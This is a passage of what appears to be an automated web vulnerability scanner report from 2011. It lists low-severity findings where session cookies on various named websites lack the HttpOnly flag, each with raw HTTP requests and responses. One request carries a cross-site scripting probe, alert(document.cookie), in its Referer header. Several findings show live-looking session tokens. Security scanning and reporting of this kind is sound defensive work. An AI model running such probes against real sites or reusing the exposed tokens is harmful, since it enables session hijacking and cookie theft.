Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 25 Jan 2011 02:20:40 GMT
Content-Type: image/jpeg
Connection: keep-alive
Set-Cookie: PHPSESSID=jstce2dl1tbrnkoho5s4o0q4h2; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 5988

......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 80
...C...............
.

...............%...#... , #&')*)..-0-(0%()(...C....
.
.

.(...(((((((((((((((((((((((((((((((
...[SNIP]...

14.7. https://cloudaccess.infusionsoft.com/AddForms/processFormSecure.jsp previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://cloudaccess.infusionsoft.com
Path:	/AddForms/processFormSecure.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=00DE583E28DB9D9872BB85A1D8248900; Path=/; Secure

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AddForms/processFormSecure.jsp HTTP/1.1
Host: cloudaccess.infusionsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=00DE583E28DB9D9872BB85A1D8248900; Path=/; Secure
Content-Type: text/html;charset=ISO-8859-1
Date: Mon, 24 Jan 2011 15:01:55 GMT
Connection: close
Content-Length: 939

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head>
<meta http-equiv="X-UA-Compatibl
...[SNIP]...

14.8. http://community.parenthood.com/feed/get/type/rss/source/domain/id/40337 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://community.parenthood.com
Path:	/feed/get/type/rss/source/domain/id/40337

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

YUKUSESSID=nfe3mp9eu1on73emvsu6v31et7; expires=Tue, 08 Feb 2011 02:23:05 GMT; path=/; domain=community.parenthood.com

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /feed/get/type/rss/source/domain/id/40337 HTTP/1.1
Host: community.parenthood.com
Proxy-Connection: keep-alive
Referer: http://community.parenthood.com/kickapps/service/getWidgetSwf.kickAction
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=CFC4B8F899936FBC1C797C6C4BB2DD5A; as=40337

Response

14.9. http://community.parenthood.com/kickapps/service/getWidgetSwf.kickAction previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://community.parenthood.com
Path:	/kickapps/service/getWidgetSwf.kickAction

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=CFC4B8F899936FBC1C797C6C4BB2DD5A; Path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /kickapps/service/getWidgetSwf.kickAction HTTP/1.1
Host: community.parenthood.com
Proxy-Connection: keep-alive
Referer: http://www.parenthood.com/?d1907'-alert(document.cookie)-'807a8eb3eff=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Moved Temporarily
Date: Tue, 25 Jan 2011 02:22:41 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: JSESSIONID=CFC4B8F899936FBC1C797C6C4BB2DD5A; Path=/
Location: http://kickapps.yuku.com/kickFlash/KickShell.swf?referralUrl=http://www.parenthood.com/?d1907'-alert(document.cookie)-'807a8eb3eff=1&widgetHost=kickapps.yuku.com&buildVersion=1.0.589
Content-Length: 0
Cache-Control: max-age=7776000
Expires: Mon, 25 Apr 2011 02:22:41 GMT
P3P: policyref="http://www.yuku.com/w3c/p3p.xml", CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa HISa OUR NOR IND PHY ONL UNI COM NAV INT DEM PRE LOC"
Content-Type: text/plain; charset=UTF-8

14.10. http://community.parenthood.com/service/searchEverythingAsRss.kickAction previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://community.parenthood.com
Path:	/service/searchEverythingAsRss.kickAction

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

JSESSIONID=06B8E490B1776258A19B5A486998A63C; Path=/
as=40337; Expires=Wed, 26-Jan-2011 04:28:40 GMT; Path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /service/searchEverythingAsRss.kickAction?vars=service/searchEverything.kickAction&keywords=phnew&includeVideo=on&includeBlog=on&as=40337&quantity=25 HTTP/1.1
Host: community.parenthood.com
Proxy-Connection: keep-alive
Referer: http://community.parenthood.com/kickapps/service/getWidgetSwf.kickAction
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=CFC4B8F899936FBC1C797C6C4BB2DD5A

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:28:41 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: JSESSIONID=06B8E490B1776258A19B5A486998A63C; Path=/
Set-Cookie: as=40337; Expires=Wed, 26-Jan-2011 04:28:40 GMT; Path=/
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: max-stale=0
P3P: policyref="http://www.yuku.com/w3c/p3p.xml", CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa HISa OUR NOR IND PHY ONL UNI COM NAV INT DEM PRE LOC"
Content-Type: text/xml;charset=UTF-8
Content-Length: 140035

<?xml version="1.0" encoding="UTF-8"?>
<rss xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:slash="http://purl.org/rss/1.0/modules/slash/" xmlns:apple-wallpapers="http://www.apple.com/
...[SNIP]...

14.11. http://dev.piwik.org/trac/browser/trunk/js/piwik.js previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://dev.piwik.org
Path:	/trac/browser/trunk/js/piwik.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

trac_form_token=9da015a43e17e45b1ae1c20c; Path=/trac
trac_session=00dd58280c5f5faa118229b7; expires=Sun, 24-Apr-2011 22:31:20 GMT; Path=/trac

The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /trac/browser/trunk/js/piwik.js HTTP/1.1
Host: dev.piwik.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:31:18 GMT
Server: Apache
Cache-control: must-revalidate
Content-Length: 243586
Set-Cookie: trac_form_token=9da015a43e17e45b1ae1c20c; Path=/trac
Set-Cookie: trac_session=00dd58280c5f5faa118229b7; expires=Sun, 24-Apr-2011 22:31:20 GMT; Path=/trac
Connection: close
Content-Type: text/html;charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<title>
/tr
...[SNIP]...

14.12. http://disqus.com/logout/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://disqus.com
Path:	/logout/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

sessionid=14f475985dbe55d9847842e30e42796e; Domain=.disqus.com; Path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /logout/ HTTP/1.1
Host: disqus.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 FOUND
Date: Mon, 24 Jan 2011 22:31:34 GMT
Server: Apache
Vary: Cookie,Accept-Encoding
Set-Cookie: sessionid=14f475985dbe55d9847842e30e42796e; Domain=.disqus.com; Path=/
Location: http://disqus.com/
Content-Length: 0
Connection: close
Content-Type: text/html; charset=utf-8

14.13. http://fastdial.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://fastdial.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

SESScb6e13bb9b3cdf11f80b4ccf0f07b677=c1uvnu853h51tppmts56d4vm81; expires=Thu, 17-Feb-2011 05:36:34 GMT; path=/; domain=.fastdial.com

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.14. http://help.tweetmeme.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://help.tweetmeme.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PHPSESSID=jcahvhmi593kcks9omcs8qbp63; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: help.tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.15. http://help.tweetmeme.com/2009/04/07/api-documentation/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://help.tweetmeme.com
Path:	/2009/04/07/api-documentation/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PHPSESSID=fri7ds4g5e569ab52b67udmd34; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /2009/04/07/api-documentation/ HTTP/1.1
Host: help.tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.16. http://help.tweetmeme.com/2009/04/09/rss-feeds/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://help.tweetmeme.com
Path:	/2009/04/09/rss-feeds/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PHPSESSID=dea45f6dnud0kld58ppcjlmap1; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /2009/04/09/rss-feeds/ HTTP/1.1
Host: help.tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.17. http://help.tweetmeme.com/2009/04/09/twitter-feeds/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://help.tweetmeme.com
Path:	/2009/04/09/twitter-feeds/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PHPSESSID=6fjaaa6od3bhvj75ou4s3p06f2; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /2009/04/09/twitter-feeds/ HTTP/1.1
Host: help.tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.18. http://help.tweetmeme.com/contact/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://help.tweetmeme.com
Path:	/contact/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PHPSESSID=p918mp9o4urak293n2lk14io61; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /contact/ HTTP/1.1
Host: help.tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.19. http://help.tweetmeme.com/faq previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://help.tweetmeme.com
Path:	/faq

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PHPSESSID=51pq19d4c1b2qs6s0igekjgic3; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /faq HTTP/1.1
Host: help.tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Tue, 25 Jan 2011 15:02:36 GMT
Server: Apache/2.2.3 (CentOS)
X-Served-By: doveweb
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=51pq19d4c1b2qs6s0igekjgic3; path=/
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Pingback: http://help.tweetmeme.com/xmlrpc.php
Last-Modified: Tue, 25 Jan 2011 15:02:38 GMT
Location: http://help.tweetmeme.com/faqs/
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8

14.20. http://help.tweetmeme.com/language/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://help.tweetmeme.com
Path:	/language/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PHPSESSID=evippa6a47912f617v4ke1qlu5; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /language/ HTTP/1.1
Host: help.tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.21. http://investor.autobytel.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://investor.autobytel.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ABTL_SESSION=1141928628%7C%20%7Bts%20%272011%2D01%2D24%2017%3A38%3A10%27%7D%7C%20%7Bts%20%272011%2D01%2D24%2017%3A38%3A10%27%7D%7C60ECCF3B67CEBC540B254D5622D5AEF8;domain=investor.autobytel.com;expires=Tue, 24-Jan-2012 22:38:10 GMT;path=/
ABTL_BRIEFCASE=UPDATED%7C40477%2E734838;domain=investor.autobytel.com;expires=Tue, 24-Jan-2012 22:38:10 GMT;path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: investor.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 24 Jan 2011 22:38:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: NOMOBILE=0;path=/
Set-Cookie: ABTL_SESSION=1141928628%7C%20%7Bts%20%272011%2D01%2D24%2017%3A38%3A10%27%7D%7C%20%7Bts%20%272011%2D01%2D24%2017%3A38%3A10%27%7D%7C60ECCF3B67CEBC540B254D5622D5AEF8;domain=investor.autobytel.com;expires=Tue, 24-Jan-2012 22:38:10 GMT;path=/
Set-Cookie: ABTL_BRIEFCASE=UPDATED%7C40477%2E734838;domain=investor.autobytel.com;expires=Tue, 24-Jan-2012 22:38:10 GMT;path=/
Set-Cookie: ABTL_PREVIEW=;expires=Sun, 24-Jan-2010 22:38:10 GMT;path=/
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Overview ><
...[SNIP]...

14.22. http://justintadlock.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://justintadlock.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PHPSESSID=kfd834f75ot3daptl2mcnd6513; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: justintadlock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:38:49 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Pingback: http://justintadlock.com/blog/xmlrpc.php
Set-Cookie: PHPSESSID=kfd834f75ot3daptl2mcnd6513; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 24229

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr
...[SNIP]...

14.23. http://justintadlock.com/archives/2008/04/13/cleaner-wordpress-gallery-plugin previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://justintadlock.com
Path:	/archives/2008/04/13/cleaner-wordpress-gallery-plugin

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PHPSESSID=8amjiosi47eb6750jiujeqgbd3; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /archives/2008/04/13/cleaner-wordpress-gallery-plugin HTTP/1.1
Host: justintadlock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 16:27:21 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Link: <http://justintadlock.com/?p=801>; rel=shortlink
Pragma: no-cache
X-Pingback: http://justintadlock.com/blog/xmlrpc.php
Set-Cookie: PHPSESSID=8amjiosi47eb6750jiujeqgbd3; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 575149

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr
...[SNIP]...

14.24. http://kickapps.yuku.com/kickapps/service/getWidget.kickAction previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://kickapps.yuku.com
Path:	/kickapps/service/getWidget.kickAction

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

JSESSIONID=2D292A4D71B9969B4DAEDD671301D676; Path=/
as=40337; Expires=Wed, 26-Jan-2011 02:22:44 GMT; Path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /kickapps/service/getWidget.kickAction?widgetId=21535&as=40337 HTTP/1.1
Host: kickapps.yuku.com
Proxy-Connection: keep-alive
Referer: http://community.parenthood.com/kickapps/service/getWidgetSwf.kickAction
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:22:44 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: JSESSIONID=2D292A4D71B9969B4DAEDD671301D676; Path=/
Set-Cookie: as=40337; Expires=Wed, 26-Jan-2011 02:22:44 GMT; Path=/
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: max-stale=0
Content-Length: 3223
P3P: policyref="http://www.yuku.com/w3c/p3p.xml", CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa HISa OUR NOR IND PHY ONL UNI COM NAV INT DEM PRE LOC"
Content-Type: text/plain; charset=UTF-8

{"adBuyOut":true,"cs_rwid":"4a2e9fce1f0e074b","cs_wid":"","feedAkHost":"community.parenthood.com","r":"kfl1-1","serverSideError":"","ssoLoginUrl":"","ssoRegisterUrl":"","widgetAkHost":"community.paren
...[SNIP]...

14.25. http://lesterchan.net/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://lesterchan.net
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

PHPSESSID=4c415ee2862c176ec82733815b99874f; path=/
wpthisvisit=1295937552; expires=Sat, 07-Jan-2012 03:59:12 GMT; path=/
wplastvisit=1295937552; expires=Sat, 07-Jan-2012 03:59:12 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: lesterchan.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:39:11 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 DAV/2 SVN/1.6.15 mod_bwlimited/1.4
X-Powered-By: PHP/5.3.4
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Pingback: http://lesterchan.net/xmlrpc.php
Set-Cookie: PHPSESSID=4c415ee2862c176ec82733815b99874f; path=/
Set-Cookie: wpthisvisit=1295937552; expires=Sat, 07-Jan-2012 03:59:12 GMT; path=/
Set-Cookie: wplastvisit=1295937552; expires=Sat, 07-Jan-2012 03:59:12 GMT; path=/
Set-Cookie: wplastvisit_posts=0; expires=Sat, 07-Jan-2012 03:59:12 GMT; path=/
Set-Cookie: wplastvisit_comments=0; expires=Sat, 07-Jan-2012 03:59:12 GMT; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 79511

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title>Lester Chan
...[SNIP]...

14.26. http://mad4milk.net/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://mad4milk.net
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ci_session=a%3A5%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%22bb984950eed1af353727ed1e76937777%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A15%3A%22173.193.214.243%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A50%3A%22Mozilla%2F4.0+%28compatible%3B+MSIE+7.0%3B+Windows+NT+6.0%29%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1295908788%3Bs%3A10%3A%22last_visit%22%3Bi%3A0%3B%7D; expires=Tue, 25-Jan-2011 00:39:48 GMT; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: mad4milk.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:39:46 GMT
Server: Apache/2.0.54
X-Powered-By: PHP/5.2.14
Set-Cookie: ci_session=a%3A5%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%22bb984950eed1af353727ed1e76937777%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A15%3A%22173.193.214.243%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A50%3A%22Mozilla%2F4.0+%28compatible%3B+MSIE+7.0%3B+Windows+NT+6.0%29%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1295908788%3Bs%3A10%3A%22last_visit%22%3Bi%3A0%3B%7D; expires=Tue, 25-Jan-2011 00:39:48 GMT; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 2866

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-e
...[SNIP]...

14.27. http://netvouz.com/action/submitBookmark previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://netvouz.com
Path:	/action/submitBookmark

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=0000e0ie9rZuNgE43J-9RQD-aOC:-1; Path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /action/submitBookmark HTTP/1.1
Host: netvouz.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.28. http://news.cnet.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://news.cnet.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

tempSessionId=Cg5gn00+3VmtwdbzK1U; domain=.cnet.com; path=/; expires=Fri, 22-Jan-2021 14:25:29 GMT
arrowLat=1295965529634; domain=.cnet.com; path=/; expires=Wed, 25-Jan-2012 14:25:29 GMT

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: news.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.29. http://newsguy.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://newsguy.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

session-id=07e5e76216ca9266b6006a1955c20780; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.30. http://newsguy.com/accountbandwidth.htm previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://newsguy.com
Path:	/accountbandwidth.htm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

session-id=0d5dff58ea2b7fa79c6665d759e36567; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /accountbandwidth.htm HTTP/1.1
Host: newsguy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: DIGEST=8tvYlg3bU.cESqZZU1EbqemKopp0oWW0L4d3d9256; session-id=07e5e76216ca9266b6006a1955c20780;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:44:33 GMT
Server: Apache/1.3.41 (Unix) mod_throttle/3.1.2 mod_perl/1.27 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7l-p1
Set-Cookie: session-id=0d5dff58ea2b7fa79c6665d759e36567; path=/
Content-Length: 9155
Cache-Control: private
Connection: close
Content-Type: text/html

...<!DOCTYPE HTML PUBLIC
"-//W3C//DTD HTML 4.0 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd" >
<html>

<head>
<title>Newsguy - Individual Accounts - Usenet Account Features</title>

...[SNIP]...

14.31. http://newsguy.com/accountemail.htm previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://newsguy.com
Path:	/accountemail.htm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

session-id=0d68fde65b4ff929e7771e9183417ec0; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /accountemail.htm HTTP/1.1
Host: newsguy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: DIGEST=8tvYlg3bU.cESqZZU1EbqemKopp0oWW0L4d3d9256; session-id=07e5e76216ca9266b6006a1955c20780;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:44:18 GMT
Server: Apache/1.3.41 (Unix) mod_throttle/3.1.2 mod_perl/1.27 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7l-p1
Set-Cookie: session-id=0d68fde65b4ff929e7771e9183417ec0; path=/
Content-Length: 9269
Cache-Control: private
Connection: close
Content-Type: text/html

...<!DOCTYPE HTML PUBLIC
"-//W3C//DTD HTML 4.0 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd" >
<html>

<head>
<title>Newsguy - Individual Accounts - Usenet Account Features</title>

...[SNIP]...

14.32. http://newsguy.com/affiliate.htm previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://newsguy.com
Path:	/affiliate.htm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

session-id=074008e54f0654946306e4e65907dd69; path=/

